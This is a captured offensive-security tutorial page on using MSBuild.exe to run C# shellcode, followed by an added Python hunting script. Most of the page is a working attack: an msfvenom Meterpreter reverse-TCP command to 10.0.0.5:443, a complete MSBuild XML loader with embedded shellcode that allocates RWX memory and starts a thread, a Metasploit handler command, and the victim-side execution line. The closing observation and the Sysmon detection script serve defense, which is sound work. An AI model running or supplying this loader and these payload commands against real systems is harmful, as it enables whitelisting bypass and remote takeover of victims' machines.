www.ired.team
Submitted URL: http://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Effective URL: https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Submission: On August 01 via manual from US — Scanned from DE
USING MSBUILD TO EXECUTE SHELLCODE IN C#

It's possible to use the native Windows binary MSBuild.exe to compile and execute inline C# code stored in an XML project file, as discovered by Casey Smith.

EXECUTION

Generate meterpreter shellcode in C#:

attacker@kali
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp
```

Insert the shellcode into the shellcode variable on line 46:

bad.xml
```xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using System.Runtime.InteropServices;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task, ITask
          {
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
              UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
            [DllImport("kernel32")]
            private static extern IntPtr CreateThread(
              UInt32 lpThreadAttributes,
              UInt32 dwStackSize,
              UInt32 lpStartAddress,
              IntPtr param,
              UInt32 dwCreationFlags,
              ref UInt32 lpThreadId
            );
            [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(
              IntPtr hHandle,
              UInt32 dwMilliseconds
            );
            public override bool Execute()
            {
              //replace with your own shellcode
              byte[] shellcode = new byte[] {
                0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x00,0x00,0x05,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5
              };
              // Allocate an RWX buffer, copy the shellcode into it, start it on a new thread and wait for it
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```

Spin up a handler in Metasploit to catch the shell:

attacker@kali
```
msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"
```

Build and execute the malicious payload on the victim system using MSBuild:

attacker@victim
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\bad\bad.xml
```

OBSERVATION

Note that it's MSBuild.exe that makes the TCP connection to the attacker, so as a defender you should think about hunting for TCP connections initiated by MSBuild.exe.

REFERENCES

https://gist.github.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17

Last updated 5 years ago
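The observation above (it is MSBuild.exe itself that opens the TCP connection) turns directly into a hunt over process and network telemetry. The Python below is an added example, not ired.team's code, that applies it to constructed Sysmon-shaped records (Event ID 1 process creation, Event ID 3 network connection) and goes one step further than the page by also flagging MSBuild.exe launched by a non-build parent or handed a project file whose extension is not a normal build input, as C:\bad\bad.xml is. The parent and extension lists are assumptions to tune per environment; the sample events are constructed, not real telemetry.

```python
"""Hunt for MSBuild.exe abuse in Sysmon-style telemetry (added example, not ired.team's code)."""
import ntpath
import shlex

# Assumption: parents that routinely launch MSBuild.exe on a developer machine.
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe", "nuget.exe"}
# Assumption: inputs MSBuild is normally handed; a .xml project such as C:\bad\bad.xml is not one.
BUILD_INPUTS = {".csproj", ".vbproj", ".fsproj", ".vcxproj", ".proj", ".sln", ".targets", ".props"}

MSBUILD32 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed Sysmon-shaped records (EventID 1 = process create, 3 = network connect).
SYSMON_SAMPLE = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": MSBUILD32,
     "CommandLine": MSBUILD32 + r" C:\bad\bad.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": MSBUILD32, "Initiated": True,
     "DestinationIp": "10.0.0.5", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": MSBUILD32,
     "CommandLine": MSBUILD32 + r" C:\src\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"EventID": 3, "ProcessGuid": "{C3}", "Initiated": True,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]


def _is_msbuild(image):
    """True when the image path ends in MSBuild.exe (Windows path semantics via ntpath)."""
    return ntpath.basename(image).lower() == "msbuild.exe"


def _project_args(command_line):
    """Return the non-switch arguments after the executable, i.e. the project file(s)."""
    parts = shlex.split(command_line, posix=False)  # keeps quoted Windows paths intact
    return [p.strip('"') for p in parts[1:] if not p.startswith(("/", "-"))]


def hunt_msbuild(events):
    """Return alerts as (rule, ProcessGuid, detail) tuples, in event order."""
    alerts = []
    for e in events:
        if e["EventID"] == 1 and _is_msbuild(e["Image"]):
            parent = ntpath.basename(e["ParentImage"]).lower()
            for arg in _project_args(e["CommandLine"]):
                if ntpath.splitext(arg)[1].lower() not in BUILD_INPUTS:
                    alerts.append(("msbuild-odd-project-file", e["ProcessGuid"], arg))
            if parent not in BUILD_PARENTS:
                alerts.append(("msbuild-odd-parent", e["ProcessGuid"], parent))
        elif e["EventID"] == 3 and e.get("Initiated") and _is_msbuild(e["Image"]):
            # The page's observation: MSBuild.exe is the process that dials out to the handler.
            alerts.append(("msbuild-network-connect", e["ProcessGuid"],
                           "%s:%s" % (e["DestinationIp"], e["DestinationPort"])))
    return alerts


if __name__ == "__main__":
    for alert in hunt_msbuild(SYSMON_SAMPLE):
        print(alert)
```

On the sample, the Visual Studio build of app.csproj produces nothing, the Chrome connection is ignored, and the bad.xml run yields three alerts for the same ProcessGuid: an unusual project file, an unusual parent (cmd.exe) and the outbound connection to 10.0.0.5:443. Correlating on ProcessGuid is what lets the network alert be tied back to the command line that caused it.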